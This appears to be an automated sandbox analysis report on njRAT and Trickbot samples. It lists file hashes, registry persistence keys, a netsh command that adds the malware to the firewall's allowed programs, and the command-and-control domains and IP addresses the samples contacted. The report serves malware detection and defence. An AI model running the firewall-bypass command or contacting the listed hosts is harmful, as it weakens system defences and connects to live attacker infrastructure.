SHA1 b262ea7343363caae54bcce98e96e163cdf4822d
SHA256 a944a5a52b5edfd19415c068a810b7249e5b5622d8faeee5d36f3fcb2462de67
SHA512 b101eb7a02d1911adee23bd63f5dbc84490b498583b802b4db0ab763de2c6abcbbb1bd28b17f9ad24e094e51bc3614bcf09c3a72841c500a9ae8d57e02a211ba

C:\Users\Admin\AppData\Local\Temp\-y9lp4ag.cmdline

MD5 8186e4024208d1c914553506fab0dd04
SHA1 df87382e8d377fef2e7ff0a908db55e384eb8eba
SHA256 983bc8404b4f410853c91e38a1d57390d481994bad4d392df3d42dfa1bd8a257
SHA512 d297108b4f9306fa8bbf5fd8f233fc1afadc1c892638e91450e0e4889cd36f4f15bce28988fd942179d5dbdb5f758f8aa6e77e21f17da205ba1912d3c92f9967

C:\Users\Admin\AppData\Local\Temp\-y9lp4ag.0.vb

MD5 3b4aed436aadbadd0ac808af4b434d27
SHA1 f8711cd0521a42ac4e7cb5fc36c5966ff28417b6
SHA256 ee55ee594a9bb7acee0dfaa9aaa31ebc044e3090b5a68baef63ddd2f6493d3a6
SHA512 6ca8a69f31876db620e8818d896257d3683dcf859841afa3ba7b83ae57ce67c47b98b4e44c449b02eb789b683b840e769857b10cf16a5a5882683e96f65ab5ef

C:\Users\Admin\AppData\Local\Temp\vbc6367570A20AB4D0EAFB8A2E12AFA3AA4.TMP

MD5 83005fc79370bb0de922b43562fee8e6
SHA1 d57a6f69b62339ddadf45c8bd5dc0b91041ea5dc
SHA256 9d8d4560bcacb245b05e776a3f2352e6dbecd1c80ac6be4ce9d6c16bc066cd9c
SHA512 9888bf670df3d58880c36d6d83cb55746111c60e3949ec8a6b6f773a08c96d7d79305192c5ad9d7c6689e93770880a5be56968bd12868b8b5d354bf5b39bee05

C:\Users\Admin\AppData\Local\Temp\RESFFBD.tmp

MD5 63f265524d149878bd62a9eb7c679966
SHA1 1dda74c88aec18b241bbf62f3ded9c80b38083b3
SHA256 c3b4bf2e271132eda02af486ecc540937f6bbe6244abb691ad24ad9871adc037
SHA512 df44a6650faea8346dad8d686eaa8a8b1c0a0e7802fac2069afd90c104aafbe3b3a5e689bedde5c190de0d151adbb3c6622c7621c891df5b2a965aead75aa8be

C:\Users\Admin\AppData\Local\Temp\iqmzrt2b.cmdline

MD5 955372532f8f49f04c49ed9bc40f380c
SHA1 476489fffef161ef1e2b6ddf02567e48b4e40d64
SHA256 a1627254a1d75f99046b1fad7e63fdc942a9c0d719a3da9893a30082a0c5bcf0
SHA512 9df3c5d5ffb7eb9a5f586d1a8f2af89e1e9727f1562e0f7e7eea9ebf5418c35161fc5b91108bcb7e5aea1fc754e1fec7c750e14a79e03ff2ae8dba73219ab12f

C:\Users\Admin\AppData\Local\Temp\iqmzrt2b.0.vb

MD5 3cbba9c5abe772cf8535ee04b9432558
SHA1 3e0ddd09ad27ee73f0dfca3950e04056fdf35f60
SHA256 946d0a95bf70b08e5b5f0005ff0b9ad4efe3b27737936f4503c1a68a12b5dc36
SHA512 c3c07c93011dc1f62de940bc134eb095fa579d6310bd114b74dd0ae86c98a9b3dd03b9d2af2e12b9f81f6b04dc4d6474bd421bce2109c2001521c0b32ae68609

C:\Users\Admin\AppData\Local\Temp\vbc34F0F6707CD4452FA446A2BB5542B741.TMP

MD5 97ea389eab9a08a887b598570e5bcb45
SHA1 9a29367be624bb4500b331c8dcc7dadd6113ff7e
SHA256 ab2e9e4fa0ade3a234fb691e1043822f23b6642a03bf355e8a94bbe648acd402
SHA512 42ab57f66062848ed8ed5384f3e3beca0d446fa1889f2960e349271ccd72f80632b7c372d11a7cf3e9da8c1119668bc748ac663def652b044101f2f31e398a36

C:\Users\Admin\AppData\Local\Temp\RES49.tmp

MD5 aa0768d4c00ef3ebee79395b3254daf6
SHA1 a271d9e516b865136a8bf0f9d1799b04ee23c1bb
SHA256 6d4ddd371042983872bbf6bc7d4d804eb6498ae81a49aba5841df8717b44c6bc
SHA512 3e33f8f3d188b52448dad578f93cb7e421184d678b3b52c836d0ff85676c94c492f6f840e70123430bd96b63fa4d21d8eca5d71ae0e6221d4fb49277a9d4f046

C:\Users\Admin\AppData\Local\Temp\o5zaj8qi.cmdline

MD5 6ca71efc2bc7de4bb47c8245c97b7897
SHA1 f39ecdff92dc7301188c90c9435d60b9fbfad29a
SHA256 bb848a7421a6dbe0aa4b4997a6bbb356091dca37af6eae8f0381513e1bf38fb4
SHA512 279bc41661e907449d66488e93d2562fb134d096502bb93369a948f367813707e2a528074196ccc135ae87038c22f7a4903ea139a656bd4c998d19e762e28963

C:\Users\Admin\AppData\Local\Temp\vbcF622CE03E80B4583A1E934F98A9591D.TMP

MD5 bd6b22b647e01d38112cdbf5ff6569a1
SHA1 1d5267e35bd6b3b9d77c8ba1aca7088ad240e2b9
SHA256 ff30b5f19155f512e7122d8ab9964e9edb148d39c0a8eb09f4b39234001f5a6e
SHA512 08c7f1400f1a3cd4e1442152ef239a18dda7daac61f4c0b0ff461c2264949b3dcd6227cbca39ff3eef39345e001f89c1ca6702065d1b9bb1659f2cf48b299a9f

C:\Users\Admin\AppData\Local\Temp\RESA7.tmp

MD5 cbbde53ca1c9efe25b45964324d3ccdf
SHA1 fc26324c55cff30e8e65717f89eff996afa3c2e8
SHA256 bbd58455633fe9751d48362ee833dec5edbd24dfcc33c7278b2270192ac62ff3
SHA512 1431582ccddeb6051be560d7c80c6ccbf2711ad58a210bb4beb5c15407eee95f9775628a595f4cf7d28ab239f2c17fe459ae4d91ffcfa086e87102e905203830

C:\Users\Admin\AppData\Local\Temp\o5zaj8qi.0.vb

MD5 e8615295f45d210bf3b7d023e3688b9f
SHA1 e33be2e3faddd8e48f62e0f30ad3cdc08bae7e33
SHA256 c81a9b36d60cc8d54374337bf1b116165c41be0cd2460ac35223fb790f5f94fc
SHA512 b48fa683711c9cd16f6e4e007145a508b617bbf9847efc1d81cdea75dda43bf88a3d094fc93fe8ef7c4b55e3dd1c4e687a6044b504b106262b2566c4ab944919

C:\Users\Admin\AppData\Local\Temp\-tv4ojmr.cmdline

MD5 95b38a8c74981d82ec525799015d6d97
SHA1 25c460885892cba97805154db9a55bac96217840
SHA256 08e6d44598e49dc7c99439a2e1088496d80a106bd9db9bdfe3cdecf42b381397
SHA512 e8ae2c21121efe82b515e6e416d83d19d51e3968f27a0597dcee43afa24ea4ffbc65340000375456bfdeadaa62525114e4a548368980823df42536cdd2697897

C:\Users\Admin\AppData\Local\Temp\-tv4ojmr.0.vb

MD5 6a3d4925113004788d2fd45bff4f9175
SHA1 79f42506da35cee06d4bd9b6e481a382ae7436a1
SHA256 21be523eca2621b9e216b058052970dc749312d2c26836639d8e8faff94c76bb
SHA512 2cfdecfa0604ad7fd54f68bf55e7c52701c7b196de51412e172526affffd6e6c4bc443b6df0fb21d2c777c809aa4e3809bd2b5b385e0d033604b6b653a0f416d

C:\Users\Admin\AppData\Local\Temp\RES105.tmp

MD5 4dcb9e3d915984508e95120284430d30
SHA1 b149fa1ca70c616347403e0f1f0fb66873d5fa43
SHA256 0dda42e578d4c39562b7ca5809ccbe2c607484c3768c202c0bcb7e7174b8360f
SHA512 30b097e468e76fdc23800a79e7e1031d9e00f77cd0294a3f19c2d12afe4b0c60f481ca28a356bc368fefdafa062462a5f4bf7bb36b2b4a5656b5414e3b916db9

C:\Users\Admin\AppData\Local\Temp\vbc52E7355544C1497E83611B5748B758.TMP

MD5 40106f913688ab0f9bcbe873333d3dbd
SHA1 bbe7cd918242a4ddc48bdcd394621cccf5a15d91
SHA256 1d1a8ff68478aed22714dab15691996d196dc975a18f656261417dfdd85dcf47
SHA512 67052405e9a8bdf9d836af9fdb13f0a4f57e7e90f0d2c3c5fd10830423e1401193699ff3b195e0cdcb2a89a3582f623ec9e5ebbef899300cf354c0ae89b765d7

C:\Users\Admin\AppData\Local\Temp\els-cvvq.cmdline

MD5 77b7e08a21b64081672999053e98d8a1
SHA1 7542f0a67b0c87316330a58f014f367aed7d0c9e
SHA256 5aac853ef61bf31b47475c0afea8528f4061e2bdace6e5e1bb10c84f5a7e8ba8
SHA512 e62105ac8ddaaf7bc7a8b4fdb8e9327233ea10d14beeb5932e7b2de14593d12bffac870ce0465344b5d435395a7e53d71667af45dbecc49f92b667c1341fe96d

C:\Users\Admin\AppData\Local\Temp\els-cvvq.0.vb

MD5 a236870b20cbf63813177287a9b83de3
SHA1 195823bd449af0ae5ac1ebaa527311e1e7735dd3
SHA256 27f6638f5f3e351d07f141cabf9eb115e87950a78afafa6dc02528113ad69403
SHA512 29bec69c79a5458dcd4609c40370389f8ec8cc8059dd26caeaf8f05847382b713a5b801339298ff832305dd174a037bfdb26d7417b1b1a913eacf616cd86f690

C:\Users\Admin\AppData\Local\Temp\RES162.tmp

MD5 99f16affd591ad8d11bae3b4f2fc0269
SHA1 d27ebe790eb5c1d2198e9af0e7a954fbe4175faa
SHA256 e2a9e59953d56f1349a3f0946fd33ebaa3a8ace8b4402de67abcf8f8d2de0dfb
SHA512 0353bfd63ade6f0da3f07c59b6e380ac3a152f8f6790f20cd1eebaee3cfdb27b69a9936749a4654488a6dc31c583e974c891f93d285d137f8d7a53718873e337

C:\Users\Admin\AppData\Local\Temp\vbcCAD5E4C644E242F4828C7A1F581E84F.TMP

MD5 38a9e24f8661491e6866071855864527
SHA1 395825876cd7edda12f2b4fda4cdb72b22238ba7
SHA256 a0dba3d6dd5111359fcaeea236f388b09fe23c4f8ec15417d5de1abf84958e96
SHA512 998fb6143141262e98dd6109bd43e1fc7389728a047d819b4a176b39bb1594e5f36c1e38cbbe41023bb91a32a33b0aa9901da1dda82513882ade7f8bd4196755

C:\Users\Admin\AppData\Local\Temp\w-vdve3v.cmdline

MD5 cfe3beee956a7055ee0d704c23e25644
SHA1 4ebe6f0e4ba38bdf0ead081f970b0a6636a859fb
SHA256 73ab51af248f4b47b2188418a7b281186b45a0f43a34f5871fd6de698d70b34f
SHA512 f8f8bbd8e5551fc9ffba2ce49da5463549eb41885e5b9b01d3652a1cf7cfd396a751cfbf39947281f9c49480c05bbef4000c62540d9761ab8333fed40d36def0

C:\Users\Admin\AppData\Local\Temp\w-vdve3v.0.vb

MD5 44ab29af608b0ff944d3615ac3cf257b
SHA1 36df3c727e6f7afbf7ce3358b6feec5b463e7b76
SHA256 03cbb9f94c757143d7b02ce13e026a6e30c484fbadfb4cd646d9a27fd4d1e76d
SHA512 6eefa62e767b4374fa52fd8a3fb682a4e78442fe785bfe9b8900770dbf4c3089c8e5f7d419ec8accba037bf9524ee143d8681b0fae7e470b0239531377572315

C:\Users\Admin\AppData\Local\Temp\RES1D0.tmp

MD5 093669c25c4598fda3069a55cbca1f12
SHA1 1985a2dab9b8958494f8b71ada6bc232ba5680fc
SHA256 a26267b044a09be465a326acd22a09b838b8447cdffc13b6136440949753e225
SHA512 d64b33cbc94f8108729acd8524c6f79d320b6652d731f5898074191d6621ff642c4b6b5422f396f7b9fcba5ba916c1fe111e8031b341ef5581cbb02f75559cb6

C:\Users\Admin\AppData\Local\Temp\vbc4096DB147B10453A98917E85DB63EAF.TMP

MD5 17a9f4d7534440cae9e1b435719eceb9
SHA1 bc4c3569dbd3faf4beac74a4b3ea02b33e019530
SHA256 5e05232caa624438da3cd74d3cf72b04c2b383fd68448a110b892a4913e91470
SHA512 673b374c701d5756a55fd20122b00c497843b5116cc6e7dfd4b71755a692024d70a30c00f803427c343f2227ed5bc48df67234a41cb88dbf5eed70810e470f07

C:\Users\Admin\AppData\Local\Temp\6sywpk7h.cmdline

MD5 44c0207a2520e50d6a4a7382da9dbf9e
SHA1 66b9a02206adb3083554859e38656834082f8013
SHA256 cd37f4c29fd491f47d5fc6f864187a8ff428b8ccb4c3f97c9afa3b3f0cd014b3
SHA512 2a861d8327b76da06c14d9bbfdc090d5f74e5e242686fbbdf7d5f1291367a56b4335dbefd409fa258d863d7d519e4a895b7f989903c821634b13d6398613b2cf

C:\Users\Admin\AppData\Local\Temp\6sywpk7h.0.vb

MD5 0ad1ae93e60bb1a7df1e5c1fe48bd5b2
SHA1 6c4f8f99dfd5a981b569ce2ddff73584ece51c75
SHA256 ea68ce9d33bd19a757922ba4540978debcba46f1133fbc461331629e666d6397
SHA512 a137a8f18a2b2ff9c31556044dd7c41fb589a6a52b15e4dc6cbb3ba47ab4a06d8b9ad54fb498100dab33f8a217848d31f14daca736045afb4f76ffb650b17f03

C:\Users\Admin\AppData\Local\Temp\vbc273C6A3A5576456A99FBC6AB83E3F6A.TMP

MD5 3ca7194685ffa7c03c53d5a7dbe658b1
SHA1 c91550da196d280c258d496a5b482dfdae0d337c
SHA256 09fd06c1908591feac9dcda2a519bf862519267cd4e42c9d25b772b1d9161f39
SHA512 949801ea9aa592e118678ff62949633e9f0502f2c07bbb398484de6911f9cf652f40bfb446aee8ec59f6262fb8da8792efa56119c90eee44a199dab7226b54b9

C:\Users\Admin\AppData\Local\Temp\RES22E.tmp

MD5 55ad4a421e72aeeebdacd497e290a805
SHA1 45c20afb946af4499a27af2e16b41e96a4f99689
SHA256 4e2d0413815496b0b8a858d6945a88a3e8aa8899dd5f8a28ebf08343c22e506a
SHA512 9c3bcc2ea864b2a0a7e71581b6526ca959620a8a21013a7a711640904920737e97ac7bd521141df329622af3e6516f052f25bb50071bb27bf63a267c1ef72a0e

C:\Users\Admin\AppData\Local\Temp\lbxakjmm.cmdline

MD5 268323d591eb97b088de4633149f9aab
SHA1 ba9c8f29164ff4c603e4571f5a74a57a3710eb9e
SHA256 e9fb199a240a2126f453fa9e725a0ebbf5b94f2015d57d675f76f0bade3b0913
SHA512 a0b13d3b82ff472b1dac613964899265833ea31c9c2290c9398b949f3ceb1d6962b04da29e351fd81e8f1a4796cefb167660ba6eb3f596df48aa430fe456b310

C:\Users\Admin\AppData\Local\Temp\vbc6331EDE1F6164333905634FAD2D9E6A7.TMP

MD5 694fb05871caccdce836dd0f109c4f86
SHA1 0cfa12096a38ce2aa0304937589afc24589ff39a
SHA256 bc1513ac66cd5adf438ed32370cf1bb219e07e602cc796525b822b0bd78b12fe
SHA512 50944dfe4013054ddf1529e6fe4d23af42aada5164dfea1316fbf18846e38006ba3cc8ef03dd6ab7ceb810ccf25dafc0fb790e2a6a0b0f3b2197b640d65cacd4

C:\Users\Admin\AppData\Local\Temp\RES28B.tmp

MD5 410449f33c7f5c022a1c1eac007bc50c
SHA1 f149e438a47f1e20d7600196f16d24df29d3e508
SHA256 fc2fcc124fea7b9a360adee8a65a8289444b5a0b7831f5c846b07865d9e7c97a
SHA512 7c1062c7a867965ec41554fb97ceac26e15e4d58e9caf2e3715be0b0270b1be3e4a72a4d300672c96aa0e033e868143799bff4a6836a2a1b36bed999cc379580

C:\Users\Admin\AppData\Local\Temp\lbxakjmm.0.vb

MD5 7d4fad6697777f5a8450a12c8d7aa51f
SHA1 879db5558fb1a6fac80a5f7c5c97d5d293a8df5c
SHA256 741018cae167c9f6c1206e75ddf3d758543f9a16bec5d56a07fab9eb5439e3f6
SHA512 6a31b4eab1829db245773e18e97f9a9956224174e28218476e45e8907bf8b4341ed732a0153a320cb956f2eca4e014c1ef6b0c6f627cf97a79b7a81f8e1fe144

C:\Users\Admin\AppData\Local\Temp\wup2lvx9.0.vb

MD5 40650ce23f89e4cd8462efe73fa023ce
SHA1 8709317f898d137650ecb816743e3445aa392f75
SHA256 ae23b3ffff9fb03b649f412247c342e9cd970e371b0d5dea6be75a26617a5afb
SHA512 b6ec7998e2a9703e2badcb41e60128f340c1c4ffcb9aa2c6532b3dc18024abdec1f739148f45d66417df84f3beed1a15ddbf9f33da073018ab902531ccbde850

C:\Users\Admin\AppData\Local\Temp\wup2lvx9.cmdline

MD5 13042d89c345b3625a519dee63fed807
SHA1 8ea358a4d87242fb5079356813a296a3fa106fbc
SHA256 28094cc1d930e084b075263e5d8473614deb802d8639713ecf4ccd4762679d0a
SHA512 aae12a606c251d96c74696292effbf9e2002078e43130608b370bd77c47baea1187613e0d923a6f6048e949dab69a7cd415007c89e3b871f94a903c6f09faeb0

C:\Users\Admin\AppData\Local\Temp\RES2E9.tmp

MD5 ff7c5edf2516d700618336840445b893
SHA1 f86e97833495e0acbc775191e72f27a85856601d
SHA256 86ee465351b6a1770a69ea971a229545b71968d8175794d697395523296b1fcb
SHA512 c2ee8b8c2510c966042f18e75583fd30c7f03c5412c0ce107fbabba701bc8022eee7cdbcd60287a0d1b7e0068aaa94d4a6a47e9a19ebfa76038f29c54a9194d2

C:\Users\Admin\AppData\Local\Temp\vbc39DCF8D5AE70476C9C21A71D6D52D9CB.TMP

MD5 b751c6d2b6e47c4ca34e85791d8d82ff
SHA1 e9e7402eece094b237e1be170fecc62b33ffb250
SHA256 c66789b3014305976b263fa7bbb629bcf543d07f0c2bfa11cde4a2aa957b26d4
SHA512 d9f7a8a1ffffcf13c6fa35a8a76f9adbde49ebfe1de6a4fa0e3e0cfcd3a28e035a0ba5a6e5d9a4c5fc9cad2adf1f93fecff036f1540f3f623fdafa226f2ded0b

C:\Users\Admin\AppData\Local\Temp\rn0a6lu6.0.vb

MD5 37c6619df6617336270b98ec25069884
SHA1 e293a1b29fd443fde5f2004ab02ca90803d16987
SHA256 69b5796e1bb726b97133d3b97ebb3e6baac43c0474b29245a6b249a1b119cd33
SHA512 c19774fc2260f9b78e3b7ee68f249ce766dcdc5f8c5bc6cfc90f00aa63ce7b4d8c9b5c6f86146aa85e15fd0c5be7535cc22e0a9949ef68fbd5aca0436c3bd689

C:\Users\Admin\AppData\Local\Temp\vbc20603B019A994E2C847E4CF5B991EE8.TMP

MD5 9874538991433131fb3158b7b1f83d46
SHA1 9e9efd410b28be52f091ceab335eb1e6ed8e001c
SHA256 2d5286b5a40631602fb0c35d2b9da6236434a22f3dfc1b98239987d72ae8d04c
SHA512 9ee53b9dccdc5418870ffee74e692b01c0d78305bebbb360d01aa628957914a4ed8f36afa83cbc016ee8694b8da8d08fec4de4b227b6429b5f1f48b13a3efb42

C:\Users\Admin\AppData\Local\Temp\rn0a6lu6.cmdline

MD5 da1119e67d9b0b1952a3d4d5744fec75
SHA1 ac6c6b2fdb256a3857327b72026304fd5eb04d54
SHA256 12d2ca90b48708ef4da7b5a0cb47249547fcfb40fb07f475ba9bca50e1826d9a
SHA512 b188afc7b1908ce16e72c03be7b380df822c6fb44848f0cf505b539d03b307aa54e09fb5f68b2e384110a06c33d28901e0be652bee24abdc49e76871c59c1721

Analysis: behavioral11

Detonation Overview

Submitted

2024-12-04 19:31

Reported

2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\gjMEi6eG.exe"

Signatures

Njrat family

njrat

njRAT/Bladabindi

trojan njrat

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\gjMEi6eG.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c6c84eeabbf10b049aa4efdb90558a88 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\c6c84eeabbf10b049aa4efdb90558a88 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\gjMEi6eG.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\gjMEi6eG.exe

"C:\Users\Admin\AppData\Local\Temp\gjMEi6eG.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 srpmx.ddns.net udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 srpmx.ddns.net udp
US 8.8.8.8:53 srpmx.ddns.net udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 srpmx.ddns.net udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 srpmx.ddns.net udp
US 8.8.8.8:53 srpmx.ddns.net udp
US 8.8.8.8:53 srpmx.ddns.net udp
US 8.8.8.8:53 srpmx.ddns.net udp
US 8.8.8.8:53 srpmx.ddns.net udp
US 8.8.8.8:53 srpmx.ddns.net udp
US 8.8.8.8:53 srpmx.ddns.net udp
US 8.8.8.8:53 srpmx.ddns.net udp
US 8.8.8.8:53 srpmx.ddns.net udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 srpmx.ddns.net udp
US 8.8.8.8:53 srpmx.ddns.net udp
US 8.8.8.8:53 srpmx.ddns.net udp
US 8.8.8.8:53 srpmx.ddns.net udp
US 8.8.8.8:53 srpmx.ddns.net udp
US 8.8.8.8:53 srpmx.ddns.net udp
US 8.8.8.8:53 srpmx.ddns.net udp
US 8.8.8.8:53 srpmx.ddns.net udp
US 8.8.8.8:53 srpmx.ddns.net udp
US 8.8.8.8:53 srpmx.ddns.net udp

Files

memory/4640-0-0x00000000750F2000-0x00000000750F3000-memory.dmp

memory/4640-1-0x00000000750F0000-0x00000000756A1000-memory.dmp

memory/4640-2-0x00000000750F0000-0x00000000756A1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\server.exe

MD5 9ab1a677fb73e7c5a41d151c4c21f69e
SHA1 10219ed34a3f76ca7fe30eb27a1a78d83c9ada37
SHA256 2027c43348230de4a40e7ec590d692f744f36cdb13eb65f599983158e920cdb9
SHA512 0c9f2e1555c36a3742a2ec604faf9a89bfd856946024596912bc116ad7f4fd15ee67969704956d30d70e7b6cb3a626168c309add57469adb03d389df0596f3c5

memory/3656-13-0x00000000750F0000-0x00000000756A1000-memory.dmp

memory/4640-12-0x00000000750F0000-0x00000000756A1000-memory.dmp

memory/3656-14-0x00000000750F0000-0x00000000756A1000-memory.dmp

memory/3656-15-0x00000000750F0000-0x00000000756A1000-memory.dmp

memory/3656-16-0x00000000750F0000-0x00000000756A1000-memory.dmp

memory/3656-17-0x00000000750F0000-0x00000000756A1000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-12-04 19:31

Reported

2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\openme.exe"

Signatures

Trickbot

trojan banker trickbot

Trickbot family

trickbot

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\openme.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\openme.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\wermgr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\openme.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\openme.exe

"C:\Users\Admin\AppData\Local\Temp\openme.exe"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc

C:\Windows\system32\wermgr.exe

C:\Windows\system32\wermgr.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2008 -ip 2008

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 680

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 101.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 86.49.80.91.in-addr.arpa udp
IN 103.146.232.5:449 tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
BD 103.156.126.232:449 tcp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
BD 103.131.157.161:449 tcp
ID 103.52.47.20:449 tcp
BD 103.150.68.124:449 tcp
ZA 102.164.206.129:449 tcp

Files

memory/2008-14-0x00000000022A0000-0x00000000022A2000-memory.dmp

